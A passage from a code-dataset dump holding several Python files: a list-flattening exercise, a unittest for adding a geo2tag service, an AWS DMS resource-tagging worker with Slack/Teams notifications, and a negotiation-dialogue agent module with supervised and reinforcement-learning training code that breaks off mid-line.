flatter_lst.append(num)\nprint(flatter_lst)\nprint(max(flatter_lst))\n# flattrn_lst=[num for sub in lst for num in sub]\n# print(flattrn_lst)\n# num_grt=[num for num in flattrn_lst if num>16]\n# print(num_grt)\n# num_odd=[num for num in flattrn_lst if num%2!=0]\n# print(num_odd)\n\n# num_even=sum([num for num in flattrn_lst if num%2==0])\n# print(num_even)\n","repo_name":"jaseel24/pythonworks","sub_path":"listwork/nestedlist.py","file_name":"nestedlist.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24741949535","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport unittest\nfrom db_model import addService, getDbObject\nfrom service_already_exists_exception import ServiceAlreadyExistsException\n\nDB = \"geomongo\"\nCOLLECTION = \"services\"\nID = \"_id\"\n\n\nclass TestAddService(unittest.TestCase):\n\n def testAddService(self):\n collection = getDbObject(DB)[COLLECTION]\n with self.assertRaises(ServiceAlreadyExistsException):\n obj = addService(\"testservice\", 1, ' ')\n obj_id = addService(\"test_GT_1203\", 1, ' ')\n obj = collection.find_one({ID: obj_id})\n self.assertNotEqual(obj, None)\n","repo_name":"PriyankaSurti/geo2tag","sub_path":"src/tst/test_GT_1203_add_service.py","file_name":"test_GT_1203_add_service.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"34966168786","text":"import os\nfrom helper.database_migration_service_helper import DatabaseMigrationServiceHelper\nfrom schemas.tag import TagModel\nfrom notification.slack import slack_event\nfrom notification.teams import teams_event\n\ndef EndPoint(event, user):\n tag = TagModel(key=\"CreatedBy\", value=user)\n endpointArn = event['detail']['responseElements']['endpoint']['endpointArn']\n tagged = DatabaseMigrationServiceHelper().tagging(resource=endpointArn, tag=tag)\n if tagged:\n if os.getenv(\"ENABLE_SLACK\"):\n slack_event(endpointArn, user,\n event['account'], event['region'], event['source'])\n elif os.getenv(\"ENABLE_TEAMS\"):\n teams_event(endpointArn, user, event['account'],\n event['region'], event['source'])\n else:\n print(\"We will improve with other versions\")\n\ndef Certificate(event, user):\n tag = TagModel(key=\"CreatedBy\", value=user)\n certificateArn = event['detail']['responseElements']['certificate']['certificateArn']\n tagged = DatabaseMigrationServiceHelper().tagging(\n resource=certificateArn, tag=tag)\n if tagged:\n if os.getenv(\"ENABLE_SLACK\"):\n slack_event(certificateArn, user,\n event['account'], event['region'], event['source'])\n elif os.getenv(\"ENABLE_TEAMS\"):\n teams_event(certificateArn, user, event['account'],\n event['region'], event['source'])\n else:\n print(\"We will improve with other versions\")\n\n\ndef Subnet(event, user):\n tag = TagModel(key=\"CreatedBy\", value=user)\n SubnetGroupIdentifier = event['detail']['responseElements']['replicationSubnetGroup']['replicationSubnetGroupIdentifier']\n replicationSubnetGroupArn = 'arn:aws:dms:' + event['region'] + ':' + event[\n 'account'] + ':subgrp:' + SubnetGroupIdentifier\n tagged = DatabaseMigrationServiceHelper().tagging(\n resource=replicationSubnetGroupArn, tag=tag)\n if tagged:\n if os.getenv(\"ENABLE_SLACK\"):\n slack_event(replicationSubnetGroupArn, user,\n event['account'], event['region'], event['source'])\n elif os.getenv(\"ENABLE_TEAMS\"):\n teams_event(replicationSubnetGroupArn, user, event['account'],\n event['region'], event['source'])\n else:\n print(\"We will improve with other versions\")\n\ndef EventSubscription(event, user):\n tag = TagModel(key=\"CreatedBy\", value=user)\n custSubscriptionId = event['detail']['responseElements']['eventSubscription']['custSubscriptionId']\n eventSubscriptionArn = 'arn:aws:dms:' + \\\n event['region'] + ':' + event['account'] + ':es:' + custSubscriptionId\n tagged = DatabaseMigrationServiceHelper().tagging(\n resource=eventSubscriptionArn, tag=tag)\n if tagged:\n if os.getenv(\"ENABLE_SLACK\"):\n slack_event(eventSubscriptionArn, user,\n event['account'], event['region'], event['source'])\n elif os.getenv(\"ENABLE_TEAMS\"):\n teams_event(eventSubscriptionArn, user, event['account'],\n event['region'], event['source'])\n else:\n print(\"We will improve with other versions\")\n\n\ndef ReplicationInstance(event, user):\n tag = TagModel(key=\"CreatedBy\", value=user)\n replicationInstanceArn = event['detail']['responseElements']['replicationInstance']['replicationInstanceArn']\n tagged = DatabaseMigrationServiceHelper().tagging(\n resource=replicationInstanceArn, tag=tag)\n if tagged:\n if os.getenv(\"ENABLE_SLACK\"):\n slack_event(replicationInstanceArn, user,\n event['account'], event['region'], event['source'])\n elif os.getenv(\"ENABLE_TEAMS\"):\n teams_event(replicationInstanceArn, user, event['account'],\n event['region'], event['source'])\n else:\n print(\"We will improve with other versions\")\n","repo_name":"Taghsin/taghsin","sub_path":"src/workers/dms_client.py","file_name":"dms_client.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"27970008767","text":"import torch as th\nimport numpy as np\nfrom scipy.misc import logsumexp\n\nfrom stanza.research import config\nfrom stanza.research.rng import get_rng\nfrom stanza.research.instance import Instance\n\nimport neural\nimport seq2seq\nimport tokenizers\nfrom agent import Agent, random_agent_name\nfrom baselines import RuleBasedAgent # NOQA: prevent cyclic import\nfrom vectorizers import MAX_FEASIBLE, NUM_ITEMS, GOAL_SIZE, all_possible_subcounts\nimport thutils\nfrom thutils import index_sequence, lrange, log_softmax, maybe_cuda as cu\n\nrng = get_rng()\n\nparser = config.get_options_parser()\nparser.add_argument('--max_dialogue_len', type=int, default=20,\n help='Maximum number of turns in a reinforcement learning dialogue rollout.')\nparser.add_argument('--goal_candidates', default=3, type=int,\n help='Number of candidates to sample for goal-directed decoding.')\nparser.add_argument('--goal_rollouts', default=3, type=int,\n help='Number of rollouts per candidate for goal-directed decoding.')\n\n\nITEMS = ('📕 ', '🎩 ', 'âš½ ')\nNAMES = ('book', 'hat', 'ball')\n\nAGREE = +1\nDISAGREE = -1\nNO_AGREEMENT = 0\n\n\nclass HumanAgent(Agent):\n def start(self):\n print('===Negotiation REPL===')\n print('')\n print('Type dialogue responses normally. Selection commands start with a slash:')\n print(' /s 1 2 0 : select a final deal (ask for 1 book, 2 hats, 0 balls)')\n print(\" /y , /a : agree with partner's choice\")\n print(\" /n , /d : indicate no agreement or disagree with partner's choice\")\n print('')\n\n def new_game(self, game):\n counts, your_values, _ = game\n print('NEW GAME')\n print('')\n for i in range(3):\n print(f' {ITEMS[i] * counts[i]:8s} {NAMES[i]:4s} x{counts[i]}'\n f' worth {your_values[i]:d} each')\n print('')\n self.game = game\n self.selection = None\n\n def act(self, goal_directed='ignored', both_sides='ignored'):\n while True:\n line = input('YOU: ').lower()\n if self.selection is not None:\n if not line[:2] in ('/a', '/d', '/y', '/n', '/s'):\n print(' [partner has made proposal, choose agree (/a, /y) or '\n 'disagree (/d, /n, /s)]')\n continue\n elif line[:2] in ('/a', '/y'):\n return self.selection\n elif line[:2] in ('/d', '/n'):\n return []\n elif line.startswith('/s'):\n try:\n return self.parse_selection(line, self.game[0])\n except ValueError:\n continue\n else:\n continue\n elif line.startswith('/'):\n if line[:2] == '/s':\n try:\n return self.parse_selection(line, self.game[0])\n except ValueError:\n continue\n elif line[:2] in ('/d', '/n'):\n return []\n elif line[:2] in ('/a', '/y'):\n print(' [no proposal to agree to]')\n else:\n print(' [unknown command: {}]'.format())\n else:\n return ' '.join(tokenizers.basic_unigram_tokenizer(line.strip()))\n\n def observe(self, result):\n if isinstance(result, list):\n self.print_selection('Your partner', result)\n if self.selection is None:\n self.selection = invert_proposal(result, self.game)\n print('')\n else:\n return True\n else:\n assert isinstance(result, str)\n print(f'THEM: {result}')\n\n return False\n\n def parse_selection(self, line, counts):\n try:\n elems = line.split()\n selection = [int(e) for e in elems[1:4]]\n for s, c in zip(selection, counts):\n if s < 0:\n print(\" [number of items can't be negative]\")\n raise ValueError\n elif s > c:\n print(f\" [selection ({s}) greater than number of items ({c})]\")\n raise ValueError\n\n self.print_selection('You', selection)\n return selection\n except (IndexError, ValueError):\n print(' [/s must be followed by three integers (books, hats, balls)]')\n raise ValueError\n\n def print_selection(self, agent, result):\n print('')\n if result:\n print(f' {agent} requested:')\n for i in range(3):\n print(f' {ITEMS[i] * result[i]:8s} {NAMES[i]:4s} x{result[i]}')\n else:\n print(f' {agent} indicated no agreement.')\n\n def outcome(self, outcome):\n agreement, my_value, their_value = outcome\n print('')\n if agreement == DISAGREE:\n print(' RESULT: Disagreement (0 points each).')\n elif agreement == NO_AGREEMENT:\n print(' RESULT: No agreement (0 points each).')\n else:\n print(f' RESULT: Agreement, you got {my_value} points. (Partner got {their_value}.)')\n print('')\n\n\nclass TwoModelAgent(Agent):\n def new_game(self, game):\n if not hasattr(self, 'agent_id'):\n self.agent_id = random_agent_name()\n self.game = game\n self.dialogue = []\n self.sel_singleton = [None]\n\n def sample_action(self):\n return self.act(dialogue=self.dialogue)\n\n def dialogue_rollout(self, candidate, both_sides):\n rollout = list(self.dialogue)\n sel_singleton = list(self.sel_singleton)\n self.commit(candidate, dialogue=rollout, sel_singleton=sel_singleton)\n invert = True\n end = False\n while True:\n action = self.act(both_sides=both_sides, invert=invert,\n dialogue=rollout, sel_singleton=sel_singleton)\n if invert:\n if self.observe(action, dialogue=rollout, sel_singleton=sel_singleton):\n break\n else:\n if sel_singleton[0] is not None:\n end = True\n self.commit(action, dialogue=rollout, sel_singleton=sel_singleton)\n if end:\n break\n invert = not invert\n return compute_outcome(self.game, sel_singleton[0], action)\n\n def act(self, goal_directed=False, both_sides=False,\n invert=False, dialogue=None, sel_singleton=None):\n if goal_directed:\n return self.goal_directed_action(self.options.goal_candidates,\n self.options.goal_rollouts,\n both_sides=both_sides)\n\n if dialogue is None:\n dialogue = self.dialogue\n indent = ''\n inner_verbosity = 0\n else:\n indent = ' '\n inner_verbosity = -1\n if sel_singleton is None:\n sel_singleton = self.sel_singleton\n resp_model, sel_model = self.models[:2]\n\n if sel_singleton[0] is not None:\n inst = self.get_input_instance(self.game, dialogue, invert=invert)\n with thutils.device_context(sel_model.options.device):\n output = sel_model.predict([inst], random=True, verbosity=0)[0]\n if self.options.verbosity + inner_verbosity >= 5:\n print(f' {indent}--OUTPUT [{self.agent_id}]: {repr(output)}')\n return parse_selection(output, self.game[0])\n else:\n inst = self.get_input_instance(self.game, dialogue, invert=(invert and not both_sides))\n if len(dialogue) >= self.options.max_dialogue_len:\n response = ''\n else:\n with thutils.device_context(resp_model.options.device):\n response = resp_model.predict([inst], random=True, verbosity=0)[0]\n if self.options.verbosity + inner_verbosity >= 5:\n print(f' {indent}--RESPONSE [{self.agent_id}]: {repr(response)}')\n if response == '':\n inst = self.get_input_instance(self.game, dialogue + ['YOU: '],\n invert=invert)\n with thutils.device_context(sel_model.options.device):\n output = sel_model.predict([inst], random=True, verbosity=0)[0]\n if self.options.verbosity + inner_verbosity >= 5:\n print(f' {indent}--OUTPUT [{self.agent_id}]: {repr(output)}')\n return parse_selection(output, self.game[0])\n else:\n return response\n\n def commit(self, action, dialogue=None, sel_singleton=None):\n if dialogue is None:\n dialogue = self.dialogue\n if sel_singleton is None:\n sel_singleton = self.sel_singleton\n\n if isinstance(action, list):\n dialogue.append('YOU: ')\n if sel_singleton[0] is not None:\n sel_singleton[0] = action\n else:\n dialogue.append(f'YOU: {action}')\n\n def observe(self, result, dialogue=None, sel_singleton=None):\n if dialogue is None:\n dialogue = self.dialogue\n if sel_singleton is None:\n sel_singleton = self.sel_singleton\n\n if isinstance(result, list):\n dialogue.append(f'THEM: ')\n if sel_singleton[0] is None:\n sel_singleton[0] = result\n else:\n return True\n else:\n assert isinstance(result, str)\n dialogue.append('THEM: ' + result)\n\n return False\n\n def get_input_instance(self, game, dialogue, invert=False):\n if invert:\n rewards = self.infer_their_rewards(game, self.dialogue)\n else:\n rewards = game[1]\n pieces = [f'{game[0][0]} {rewards[0]} {game[0][1]} {rewards[1]} {game[0][2]} {rewards[2]}']\n for entry in dialogue:\n if invert:\n entry = entry.replace('YOU:', 'XYOU:')\n entry = entry.replace('THEM:', 'YOU:')\n entry = entry.replace('XYOU:', 'THEM:')\n pieces.append(f'{entry} ')\n input = ' '.join(pieces)\n if dialogue:\n input = input[:-len(' ')]\n result = Instance(input, '')\n if self.options.verbosity >= 6:\n print(result.__dict__)\n return result\n\n def goal_directed_action(self, num_candidates, num_rollouts, both_sides):\n candidates = [self.sample_action() for _ in range(num_candidates)]\n if self.options.verbosity >= 5:\n for candidate in candidates:\n print(f' --CANDIDATE [{self.agent_id}]: {repr(candidate)}')\n\n best_candidates = []\n best_ave_reward = 0.0\n for candidate in candidates:\n outcomes = [self.dialogue_rollout(candidate, both_sides=both_sides)\n for _ in range(num_rollouts)]\n ave_reward = np.mean([our_outcome[1] for our_outcome, _ in outcomes])\n if self.options.verbosity >= 5:\n print(f' --AVE_REWARD [{self.agent_id}]: {ave_reward} <= '\n f'{repr(candidate)}')\n if ave_reward > best_ave_reward:\n best_candidates = [candidate]\n best_ave_reward = ave_reward\n else:\n best_candidates.append(candidate)\n choice = best_candidates[rng.randint(len(best_candidates))]\n if self.options.verbosity >= 5:\n print(f' --CHOICE [{self.agent_id}]: {repr(choice)}')\n return choice\n\n def infer_their_rewards(self, game, dialogue):\n # Pick something feasible at random.\n possible = [r for r in all_possible_rewards(game[0])\n if not has_double_zeros(r, game[1])]\n return possible[rng.randint(len(possible))]\n\n def outcome(self, outcome):\n if self.options.verbosity >= 5:\n print(f\" --GAME [{self.agent_id}]: {self.game}\")\n\n\nclass RSAAgent(TwoModelAgent):\n def infer_their_rewards(self, game, dialogue):\n assert len(self.models) >= 3, \\\n 'Not enough models for RSA agent (need 3, got {})'.format(len(self.models))\n # Use model to sample possible other rewards\n inst = self.get_input_instance(game, dialogue)\n possible = [r for r in all_possible_rewards(game[0])\n if not has_double_zeros(r, game[1])]\n score_insts = [self.fill_score_instance(inst, r, game[0])\n for r in possible]\n pred_model = self.models[2]\n with thutils.device_context(pred_model.options.device):\n scores = pred_model.score(score_insts)\n probs = np.exp(np.array(scores) - logsumexp(scores))\n if self.options.verbosity >= 6:\n print([i.output for i in score_insts])\n print(scores)\n print(probs)\n return possible[rng.choice(np.arange(len(possible)),\n p=probs)]\n\n def fill_score_instance(self, inst, rewards, counts):\n inst_dict = inst.__dict__.copy()\n inst_dict['output'] = \\\n f'{counts[0]} {rewards[0]} {counts[1]} {rewards[1]} {counts[2]} {rewards[2]}'\n return Instance(**inst_dict)\n\n\nclass FBReproAgent(Agent):\n def start(self):\n self.negotiator = self.models[0].model.module\n self.vectorizer = self.models[0].model.vectorizer\n self.tokenize, self.detokenize = tokenizers.TOKENIZERS[self.models[0].options.tokenizer]\n with self.use_device():\n resp_vec = self.vectorizer.resp_vec\n self.eos = cu(th.LongTensor(resp_vec.vectorize([''])[0])[0])\n self.you = cu(th.LongTensor(resp_vec.vectorize(['YOU:'])[0])[0])\n self.them = cu(th.LongTensor(resp_vec.vectorize(['THEM:'])[0])[0])\n self.sel_token = cu(th.LongTensor(resp_vec.vectorize([''])[0])[0])\n\n def new_game(self, game):\n if not hasattr(self, 'agent_id'):\n self.agent_id = random_agent_name()\n\n with self.use_device():\n goal_indices, self.feasible_sels, self.num_feasible_sels = self.vectorize_game(game)\n self.negotiator.context(goal_indices)\n self.game = game\n self.sel_singleton = [None]\n self.num_dialogue_turns = 0\n\n def vectorize_game(self, game):\n input_tokens = [str(e) for pair in zip(game[0], game[1]) for e in pair]\n partner_tokens = [str(e) for pair in zip(game[0], game[2]) for e in pair]\n (goal_indices, partner_,\n resp_, resp_len_,\n sel_, feasible_sels,\n num_feasible_sels) = self.vectorizer.vectorize((input_tokens,\n ['', ''],\n [''] * 3,\n partner_tokens))\n return (thutils.to_torch(goal_indices)[None, :],\n thutils.to_torch(feasible_sels)[None, :],\n thutils.to_torch(num_feasible_sels)[None, :])\n\n def act(self, goal_directed=False, both_sides=False,\n invert=False, dialogue=None, sel_singleton=None):\n if goal_directed or both_sides:\n raise NotImplementedError\n if sel_singleton is None:\n sel_singleton = self.sel_singleton\n\n with self.use_device():\n if sel_singleton[0] is not None or \\\n self.num_dialogue_turns >= self.options.max_dialogue_len:\n action = self.make_selection()\n else:\n output_predict, output_score = self.negotiator.speak(self.you, self.eos)\n (resp_indices, resp_len) = output_predict['sample']\n\n if is_selection(resp_indices, resp_len, self.sel_token):\n action = self.make_selection()\n else:\n action = self.vectorizer.resp_vec.unvectorize(thutils.to_numpy(resp_indices)[0],\n thutils.to_numpy(resp_len)[0])\n action = self.detokenize(action[1:])\n\n if self.options.verbosity >= 5:\n print(f' --ACT [{self.agent_id}]: {repr(action)}')\n return action\n\n def make_selection(self):\n empty_sel_indices = th.autograd.Variable(cu(th.LongTensor([0])))\n sel_predict, sel_score = self.negotiator.selection(empty_sel_indices,\n self.feasible_sels,\n self.num_feasible_sels)\n return parse_selection(' '.join(self.vectorizer.sel_vec.unvectorize(\n thutils.to_numpy(sel_predict['sample'])[0]\n )), self.game[0])\n\n def commit(self, action, dialogue=None, sel_singleton=None):\n if sel_singleton is None:\n sel_singleton = self.sel_singleton\n\n if isinstance(action, list):\n if sel_singleton[0] is not None:\n sel_singleton[0] = action\n return\n\n with self.use_device():\n resp_indices, resp_len = self.vectorize_response(action, self.you)\n self.negotiator.listen(resp_indices, resp_len)\n\n self.num_dialogue_turns += 1\n\n def observe(self, result, dialogue=None, sel_singleton=None):\n if sel_singleton is None:\n sel_singleton = self.sel_singleton\n\n if isinstance(result, list):\n if sel_singleton[0] is None:\n sel_singleton[0] = result\n result = ''\n else:\n return True\n\n if self.options.verbosity >= 5:\n print(f' --OBSERVE [{self.agent_id}]: {repr(result)}')\n\n with self.use_device():\n resp_indices, resp_len = self.vectorize_response(result, self.them)\n self.negotiator.listen(resp_indices, resp_len)\n\n self.num_dialogue_turns += 1\n return False\n\n def vectorize_response(self, response, you_them):\n tag = th.autograd.Variable(cu(th.LongTensor([[you_them]])))\n resp_indices, resp_len = self.vectorizer.resp_vec.vectorize(self.tokenize(response))\n tagged_resp_indices = th.cat([tag.expand(1, 1),\n thutils.to_torch(resp_indices)[None, :]], 1)\n return (tagged_resp_indices, thutils.to_torch(resp_len + 1))\n\n def use_device(self):\n return thutils.device_context(self.models[0].options.device)\n\n\ndef invert_proposal(response, game):\n return [c - s for c, s in zip(game[0], response)]\n\n\ndef parse_selection(line, counts):\n if line.startswith('<'):\n return []\n\n import re\n match = re.search(r'item0=(\\d+) item1=(\\d+) item2=(\\d+)', line)\n if not match:\n return []\n else:\n return [max(0, min(c, int(s))) for c, s in zip(counts, match.groups())]\n\n\ndef has_double_zeros(their_rewards, our_rewards):\n assert len(their_rewards) == len(our_rewards) == 3, (their_rewards, our_rewards)\n for t, o in zip(their_rewards, our_rewards):\n if t == 0 == o:\n return True\n return False\n\n\ndef compute_outcome(game, proposal_a, response_a):\n if response_a != proposal_a:\n return (DISAGREE, 0, 0), (DISAGREE, 0, 0)\n elif proposal_a == []:\n return (NO_AGREEMENT, 0, 0), (NO_AGREEMENT, 0, 0)\n else:\n value_a = sum([s * v for s, v in zip(proposal_a, game[1])])\n value_b = sum([(c - s) * v for c, s, v in zip(game[0], proposal_a, game[2])])\n return (AGREE, value_a, value_b), (AGREE, value_b, value_a)\n\n\nAGENTS = {\n c.__name__: c\n for c in [HumanAgent, TwoModelAgent, RSAAgent, RuleBasedAgent,\n FBReproAgent]\n}\n\n\nREWARDS_CACHE = {}\n\n\ndef all_possible_rewards(counts):\n counts = tuple(counts)\n if counts not in REWARDS_CACHE:\n possible = []\n for r1, r2, r3 in all_possible_subcounts([10, 10, 10]):\n if r1 * counts[0] + r2 * counts[1] + r3 * counts[2] == 10:\n possible.append((r1, r2, r3))\n REWARDS_CACHE[counts] = possible\n return REWARDS_CACHE[counts]\n\n\nclass Negotiator(th.nn.Module):\n def __init__(self, options,\n goal_vocab, resp_vocab, sel_vocab,\n delimiters,\n monitor_activations=True):\n super(Negotiator, self).__init__()\n self.monitor_activations = monitor_activations\n self.activations = neural.Activations()\n if monitor_activations:\n child_activations = self.activations\n else:\n child_activations = None\n\n self.h_init = th.nn.Linear(1, options.cell_size * options.num_layers, bias=False)\n self.c_init = th.nn.Linear(1, options.cell_size * options.num_layers, bias=False)\n\n self.context_encoder = seq2seq.RNNEncoder(src_vocab=goal_vocab,\n cell_size=options.cell_size,\n embed_size=options.embed_size,\n dropout=options.dropout,\n delimiters=delimiters[0],\n rnn_cell=options.rnn_cell,\n num_layers=options.num_layers,\n bidirectional=False,\n activations=child_activations)\n self.response_decoder = seq2seq.RNNDecoder(tgt_vocab=resp_vocab,\n cell_size=options.cell_size,\n embed_size=options.embed_size,\n dropout=options.dropout,\n delimiters=delimiters[1],\n rnn_cell=options.rnn_cell,\n num_layers=options.num_layers,\n beam_size=options.beam_size,\n extra_input_size=options.cell_size,\n max_len=options.max_length,\n activations=child_activations)\n self.response_encoder = seq2seq.RNNEncoder(src_vocab=resp_vocab,\n cell_size=options.cell_size,\n embed_size=options.embed_size,\n dropout=options.dropout,\n delimiters=delimiters[1],\n rnn_cell=options.rnn_cell,\n num_layers=options.num_layers,\n bidirectional=options.bidirectional,\n activations=child_activations)\n self.combined_layer = th.nn.Linear(options.cell_size * 2, options.cell_size, bias=False)\n self.selection_layer = th.nn.Linear(options.cell_size, sel_vocab, bias=False)\n\n def forward(self,\n goal_indices, partner_goal_indices_,\n resp_indices, resp_len,\n sel_indices, feasible_sels, num_feasible_sels):\n a = self.activations\n\n batch_size, goal_size = goal_indices.size()\n\n self.context(goal_indices)\n\n assert resp_indices.size()[0] == batch_size, resp_indices.size()\n response_predict, response_score = self.dialogue(resp_indices, resp_len)\n\n assert a.dialogue_repr.size()[0] == batch_size, (a.dialogue_repr.size(), batch_size)\n selection_predict, selection_score = self.selection(sel_indices, feasible_sels,\n num_feasible_sels)\n\n predict = {\n k: response_predict[k] + (selection_predict[k],)\n for k in response_predict\n }\n score = (response_score, selection_score)\n return predict, score\n\n def context(self, goal_indices):\n # \"GRU_g\": encode goals (values of items)\n a = self.activations\n\n batch_size, goal_size = goal_indices.size()\n assert goal_size == GOAL_SIZE, goal_indices.size()\n\n goal_len = th.autograd.Variable(cu(\n (th.ones(batch_size) * goal_size).int()\n ))\n assert goal_len.size() == (batch_size,), goal_len.size()\n\n a.context_repr_seq, _ = self.context_encoder(goal_indices, goal_len)\n assert a.context_repr_seq.dim() == 3, a.context_repr_seq.size()\n assert a.context_repr_seq.size()[:2] == (batch_size, goal_size), a.context_repr_seq.size()\n\n a.context_repr = a.context_repr_seq[:, -1, :]\n context_repr_size = a.context_repr_seq.size()[2]\n assert a.context_repr.size() == (batch_size, context_repr_size), a.context_repr.size()\n\n self.dec_state = seq2seq.generate_rnn_state(self.response_encoder,\n self.h_init, self.c_init, batch_size)\n if not isinstance(self.dec_state, tuple):\n self.dec_state = (self.dec_state,)\n\n def dialogue(self, resp_indices, resp_len, persist=True, predict=True, eos_token=None):\n # \"GRU_w\": encode and produce dialogue\n a = self.activations\n\n assert resp_indices.dim() == 2, resp_indices.size()\n batch_size, max_resp_len = resp_indices.size()\n\n dec_state_concat = tuple(self.response_encoder.concat_directions(c) for c in self.dec_state)\n response_predict, response_score, response_output = self.response_decoder(\n dec_state_concat,\n resp_indices, resp_len,\n extra_inputs=[a.context_repr],\n extra_delimiter=eos_token,\n output_beam=predict, output_sample=predict\n )\n (dialogue_repr_seq, dec_state) = response_output['target']\n if persist:\n '''\n if hasattr(a, 'dialogue_repr_seq'):\n print((resp_indices[0, :20], resp_len[0]))\n print(f' {self.dec_state[0].data[0, 0, 0]:.4f} -> '\n f' {dec_state[0].data[0, 0, 0]:.4f}')\n print(f' {a.dialogue_repr_seq.data[0, 0, 0]:.4f} -> '\n f' {dialogue_repr_seq.data[0, 0, 0]:.4f}')\n '''\n a.dialogue_repr_seq, self.dec_state = dialogue_repr_seq, dec_state\n assert dialogue_repr_seq.dim() == 3, dialogue_repr_seq.size()\n assert dialogue_repr_seq.size()[:2] == (batch_size, max_resp_len - 1), \\\n (dialogue_repr_seq.size(), (batch_size, max_resp_len - 1))\n dialogue_repr_size = dialogue_repr_seq.size()[2]\n\n dialogue_repr = index_sequence(dialogue_repr_seq.transpose(1, 2),\n th.clamp(resp_len.data, max=max_resp_len - 2)[:, None])\n if persist:\n a.dialogue_repr = dialogue_repr\n assert dialogue_repr.dim() == 2, dialogue_repr.size()\n assert dialogue_repr.size() == (batch_size, dialogue_repr_size), \\\n (dialogue_repr.size(), (batch_size, dialogue_repr_size))\n\n return response_predict, response_score\n\n def selection(self, sel_indices, feasible_sels, num_feasible_sels):\n # \"GRU_o\": encode dialogue for selection\n a = self.activations\n\n assert sel_indices.dim() == 1, sel_indices.size()\n batch_size = sel_indices.size()[0]\n\n a.combined_repr = self.combined_layer(th.cat([a.context_repr, a.dialogue_repr],\n dim=1))\n assert a.combined_repr.dim() == 2, a.combined_repr.size()\n assert a.combined_repr.size()[0] == batch_size, (a.combined_repr.size(), batch_size)\n\n a.all_item_scores = log_softmax(self.selection_layer(a.combined_repr))\n assert a.all_item_scores.size() == (batch_size, self.selection_layer.out_features), \\\n (a.all_item_scores.size(), (batch_size, self.selection_layer.out_features))\n\n a.feasible_item_scores = a.all_item_scores[\n lrange(a.all_item_scores.size()[0])[:, None, None],\n feasible_sels.data\n ]\n assert a.feasible_item_scores.size() == (batch_size, MAX_FEASIBLE + 3, NUM_ITEMS), \\\n (a.feasible_item_scores.size(), batch_size)\n\n num_feasible_mask = th.autograd.Variable(cu(\n (lrange(a.feasible_item_scores.size()[1])[None, :, None] <=\n num_feasible_sels.data[:, None, None]).float()\n ))\n a.feasible_masked = a.feasible_item_scores + th.log(num_feasible_mask)\n a.full_selection_scores = log_softmax(a.feasible_item_scores.sum(dim=2), dim=1)\n assert a.full_selection_scores.size() == (batch_size, MAX_FEASIBLE + 3), \\\n (a.full_selection_scores.size(), batch_size)\n\n a.selection_beam_score, selection_beam = a.full_selection_scores.max(dim=1)\n assert selection_beam.size() == (batch_size,), (selection_beam.size(), batch_size)\n selection_sample = th.multinomial(th.exp(a.full_selection_scores),\n 1, replacement=True)[:, 0]\n a.selection_sample_score = th.exp(a.full_selection_scores)[\n lrange(a.full_selection_scores.size()[0]),\n selection_sample.data\n ]\n assert selection_sample.size() == (batch_size,), (selection_sample.size(), batch_size)\n selection_predict = {\n 'beam': self.sel_indices_to_selection(feasible_sels, selection_beam),\n 'sample': self.sel_indices_to_selection(feasible_sels, selection_sample),\n }\n assert selection_predict['beam'].size() == (batch_size, NUM_ITEMS), \\\n (selection_predict['beam'].size(), batch_size)\n assert selection_predict['sample'].size() == (batch_size, NUM_ITEMS), \\\n (selection_predict['sample'].size(), batch_size)\n a.selection_target_score = a.full_selection_scores[\n lrange(a.full_selection_scores.size()[0]),\n sel_indices.data\n ]\n assert a.selection_target_score.size() == (batch_size,), (a.selection_score.size(),\n batch_size)\n selection_score = {\n 'target': a.selection_target_score,\n 'beam': a.selection_beam_score,\n 'sample': a.selection_sample_score,\n }\n\n return selection_predict, selection_score\n\n def sel_indices_to_selection(self, feasible_sels, sel_indices):\n return feasible_sels[lrange(feasible_sels.size()[0]), sel_indices.data, :]\n\n def speak(self, you_token, eos_token=None):\n empty_resp_indices = th.autograd.Variable(cu(th.LongTensor([[0, 1]])))\n empty_resp_len = th.autograd.Variable(cu(th.LongTensor([2])))\n response_predict, response_score = self.dialogue(empty_resp_indices, empty_resp_len,\n persist=False, eos_token=eos_token)\n del response_score['target']\n return response_predict, response_score\n\n def listen(self, resp_indices, resp_len):\n seq2seq.RNNDecoder.debug = 'a'\n self.dialogue(resp_indices, resp_len, predict=False)\n del seq2seq.RNNDecoder.debug\n\n\nclass SupervisedLoss(th.nn.Module):\n def __init__(self, options):\n super(SupervisedLoss, self).__init__()\n self.alpha = options.selection_alpha\n\n def forward(self, predict, score):\n response_score, selection_score = score\n return -response_score['target'].mean() - self.alpha * selection_score['target'].mean()\n\n\nclass RLLoss(th.nn.Module):\n def __init__(self, options):\n super(RLLoss, self).__init__()\n self.reward_history = []\n self.gamma = options.rl_gamma\n\n def forward(self, predict, score):\n dialogue, sel_a, sel_b, reward, partner_reward = predict\n response_scores, selection_score = score\n\n reward_transformed = self.transform_reward(reward)\n step_rewards = []\n discount = th.Variable(cu(th.FloatTensor([1.0])))\n for i in range(len(response_scores)):\n step_rewards.append(discount * reward_transformed)\n discount = discount * self.gamma\n\n loss = th.Variable(cu(th.FloatTensor([0.0])))\n for score, step_reward in zip(response_scores, step_rewards):\n loss -= score * step_reward\n\n return loss\n\n def transform_reward(self, reward):\n self.reward_history.append(reward)\n mu = np.mean(self.reward_history)\n sigma = max(1.0, np.std(self.reward_history))\n return (reward - mu) / sigma\n\n\nclass RLNegotiator(th.nn.Module):\n def __init__(self, negotiator, partner, vectorizer, options):\n super(RLNegotiator, self).__init__()\n self.negotiator = negotiator\n self.partner = partner\n self.vectorizer = vectorizer\n self.eos = cu(th.LongTensor(self.vectorizer.resp_vec.vectorize([''])[0])[0])\n self.you = cu(th.LongTensor(self.vectorizer.resp_vec.vectorize(['YOU:'])[0])[0])\n\n self.epsilon = options.rl_epsilon\n self.max_dialogue_len = options.max_dialogue_len\n\n def forward(self,\n goal_indices, partner_goal_indices,\n resp_indices_, resp_len_,\n sel_indices_, feasible_sels, num_feasible_sels):\n num_feasible_sels = th.autograd.Variable(cu(th.LongTensor(\n [feasible_sels.size()[1]]\n )))\n\n self.negotiator.context(goal_indices)\n self.partner.context(goal_indices)\n\n my_turn = rng.choice([True, False])\n dialogue = []\n policy_scores = []\n for _ in range(self.max_dialogue_len):\n me = self.negotiator if my_turn else self.partner\n other = self.partner if 